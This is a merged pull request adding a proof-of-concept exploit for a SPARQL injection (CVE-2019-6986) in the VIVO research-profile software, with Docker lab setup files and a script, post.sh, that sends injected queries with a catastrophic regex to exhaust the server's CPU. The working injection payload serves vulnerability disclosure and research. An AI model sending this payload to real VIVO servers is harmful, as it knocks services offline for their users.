Merge pull request #4 from kevinbackhouse/Vitro

Exploit PoC for SPARQL injection in VIVO

Author: s0

vivo-project/CVE-2019-6986/README.md

@@ -0,0 +1,110 @@
+# SPARQL Injection in VIVO (CVE-2019-6986)
+
+This directory contains a proof-of-concept exploit for a SPARQL injection vulnerability in [VIVO](https://duraspace.org/vivo/). This vulnerability has been assigned [CVE-2019-6986](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6986). The exploit targets [this line of code](https://github.com/vivo-project/Vitro/blob/6e717446b4a1b3da0fcf0130f3d0cfd1ce8b75ed/api/src/main/java/edu/cornell/mannlib/vitro/webapp/dao/jena/IndividualSDB.java#L155). It triggers a denial of service by generating a query containing a [ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).
+
+## Network setup
+
+Create a docker network bridge, to simulate a network with two separate computers.
+
+```
+docker network create -d bridge --subnet 172.18.0.0/16 vivo-demo-network
+```
+
+## Vivo server setup
+
+Build the docker image:
+
+```
+docker build vivo-server -t vivo-server --build-arg UID=`id -u`
+```
+
+Start the container:
+
+```
+docker run --rm --network vivo-demo-network --ip=172.18.0.10 -h vivo-server --publish 8000:8000 --publish 8080:8080 -i -t vivo-server
+```
+
+Inside the container, start VIVO.
+
+```
+sudo ./init_mysql.sh  #  password is: x
+/usr/local/tomcat/bin/catalina.sh start
+```
+
+It seems to take Vivo at least 10 minutes to initialize itself. You can monitor its progress in this log file:
+
+```
+/usr/local/tomcat/logs/vivo.all.log
+```
+
+Vivo isn't ready until you see lines like this at the bottom of `vivo.all.log`:
+
+```
+2019-01-17 22:19:31,004 INFO  [IndexHistory] STARTUP, 1/17/19, 10:17 PM, []
+2019-01-17 22:19:31,008 INFO  [FreemarkerSetup] Freemarker templating system initialized.
+2019-01-17 22:19:31,122 INFO  [VClassGroupCache] VClassGroupCache added to context
+2019-01-17 22:19:31,123 INFO  [VClassGroupCache] VClassGroupCache set to listen to events from IndexBuilder
+2019-01-17 22:19:31,126 INFO  [StartupManager] Called 'contextInitialized' on all listeners.
+2019-01-17 22:19:31,330 INFO  [JSessionStripFilter] Filtering: no jsessionids will be generated.
+```
+
+At this point, you can check that Vivo is running by visiting [http://127.0.0.1:8080/vivo](http://127.0.0.1:8080/vivo) in your browser. (We exposed port 8080 on the docker container.) To login, the username is `vivo_root@mydomain.edu` and the password is `rootPassword`.
+
+# Tomcat debugging
+
+You can debug the application with Eclipse, even when it is running in docker. To do this you need to also bind port 8000 when you start docker. (This was already included in the instructions above.)
+
+Inside docker, start tomcat like this:
+
+```
+export JPDA_ADDRESS=0.0.0.0:8000
+export JPDA_TRANSPORT=dt_socket
+/usr/local/tomcat/bin/catalina.sh jpda start
+```
+
+Next you need to get the VIVO source code on your main machine and build it. The purpose of this is primarily to get maven to download all the dependencies so that Eclipse can see them.
+
+```
+git clone https://github.com/vivo-project/VIVO.git
+git clone https://github.com/vivo-project/Vitro.git
+cd VIVO/
+mvn package -DskipTests
+mvn eclipse:eclipse
+```
+
+Then import the VIVO and Vitro projects into Eclipse. Inside Eclipse, create a remote debug configuration, connecting to localhost:8000 (which is the default.)
+
+## Attacker setup
+
+Build the docker image:
+
+```
+docker build vivo-attacker -t vivo-attacker
+```
+
+Start the container:
+
+```
+docker run --rm --network vivo-demo-network --ip=172.18.0.11 -h vivo-attacker -i -t vivo-attacker
+```
+
+Inside the container, use `post.sh` to send 8 malicious request to VIVO.
+
+```
+./post.sh
+```
+
+The `curl` command inside `post.sh` never receives a response from the VIVO server, so you will see 8 timeout error messages on the command line:
+
+```
+curl: (28) Operation timed out after 1001 milliseconds with 0 bytes received
+curl: (28) Operation timed out after 1001 milliseconds with 0 bytes received
+curl: (28) Operation timed out after 1001 milliseconds with 0 bytes received
+curl: (28) Operation timed out after 1001 milliseconds with 0 bytes received
+curl: (28) Operation timed out after 1001 milliseconds with 0 bytes received
+curl: (28) Operation timed out after 1001 milliseconds with 0 bytes received
+curl: (28) Operation timed out after 1001 milliseconds with 0 bytes received
+curl: (28) Operation timed out after 1001 milliseconds with 0 bytes received
+```
+
+VIVO is now hogging 8 CPU cores.

vivo-project/CVE-2019-6986/vivo-attacker/Dockerfile

@@ -0,0 +1,15 @@
+FROM ubuntu:bionic
+
+RUN apt-get update && \
+    apt-get install -y curl tmux emacs net-tools ssh sudo
+
+# Create user account for the attacker.
+RUN adduser attacker --disabled-password
+
+# Copy the exploit PoC into the attacker's home directory.
+COPY post.sh /home/attacker/post.sh
+RUN chown attacker:attacker /home/attacker/post.sh
+
+# Switch over to the 'attacker' user, since root access is no longer required
+USER attacker
+WORKDIR /home/attacker

vivo-project/CVE-2019-6986/vivo-attacker/post.sh

@@ -0,0 +1,5 @@
+#!/bin/bash
+for i in {1..8}
+do
+    curl -m 1 http://172.18.0.10:8080/vivo/individual?uri=http%3A%2F%2Fvivoweb.org%2Fontology%2Fcore%23FacultyMember%3E%20%3Fp%20%3Fo%20.%20FILTER%20regex%28%22aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%21%22%2C%20%22%28.%2Aa%29%7B50%7D%22%29%20%7D%20%23%20
+done

vivo-project/CVE-2019-6986/vivo-server/Dockerfile

@@ -0,0 +1,54 @@
+FROM ubuntu:bionic
+
+RUN apt-get update && \
+    apt-get install -y \
+      maven git curl wget zip unzip mysql-server \
+      tmux sudo emacs maven openssh-server net-tools x11-apps \
+      default-jdk openjdk-11-dbg
+
+# Workaround for https://serverfault.com/questions/870568
+# VOLUME /var/lib/mysql
+
+ARG UID=1000
+
+# Create a non-root user account to run Struts.
+RUN adduser vivo --disabled-password --uid $UID
+
+# Grant the 'vivo' user sudo access, so that we can start sshd.
+RUN adduser vivo sudo
+RUN echo "vivo:x" | chpasswd
+
+# Get Tomcat.
+RUN cd /tmp && \
+    wget http://www-eu.apache.org/dist/tomcat/tomcat-9/v9.0.14/bin/apache-tomcat-9.0.14.tar.gz && \
+    tar xf apache-tomcat-9.0.14.tar.gz && \
+    mv apache-tomcat-9.0.14 /usr/local/tomcat && \
+    rm apache-tomcat-9.0.14.tar.gz
+
+COPY init_mysql.sh /home/vivo/init_mysql.sh
+RUN chown vivo:vivo /home/vivo/init_mysql.sh
+
+RUN mkdir -p /usr/local/vivo/home
+RUN chown -R vivo:vivo /usr/local/tomcat
+RUN chown -R vivo:vivo /usr/local/vivo
+
+# Switch over to the 'vivo' user, since root access is no longer required
+USER vivo
+WORKDIR /home/vivo
+
+# Create an ssh authorized keys file. Systems administrators would add their
+# public key to this file so that they can login remotely with ssh.
+RUN mkdir -m 700 ~/.ssh && touch ~/.ssh/authorized_keys && chmod 600 ~/.ssh/authorized_keys
+
+# Get Vivo source code.
+RUN git clone https://github.com/vivo-project/Vitro.git Vitro
+RUN cd Vitro && git checkout 6e717446b4a1b3da0fcf0130f3d0cfd1ce8b75ed
+RUN git clone https://github.com/vivo-project/VIVO.git VIVO
+RUN cd VIVO && git checkout 3da53e27fe1020ffd3157d288f6fe39ec15f87b2
+
+# Build Vivo.
+RUN cd VIVO && mvn install -s installer/example-settings.xml
+
+RUN cd /usr/local/vivo/home/config && \
+    cp example.runtime.properties runtime.properties && \
+    cp example.applicationSetup.n3 applicationSetup.n3

vivo-project/CVE-2019-6986/vivo-server/init_mysql.sh

@@ -0,0 +1,20 @@
+#!/bin/bash
+
+if [[ $EUID -ne 0 ]]; then
+   echo "This script must be run as root"
+   exit 1
+fi
+
+# Workaround for this issue: https://serverfault.com/questions/870568
+chown -R mysql:mysql /var/lib/mysql
+
+service mysql start
+
+Commands=$(cat <<EOF
+CREATE DATABASE vitrodb CHARACTER SET utf8;
+CREATE USER 'vitrodbUsername'@'localhost' IDENTIFIED BY 'vitrodbPassword';
+GRANT ALL PRIVILEGES ON vitrodb.* TO 'vitrodbUsername'@'localhost';
+EOF
+)
+
+echo "$Commands" | mysql -p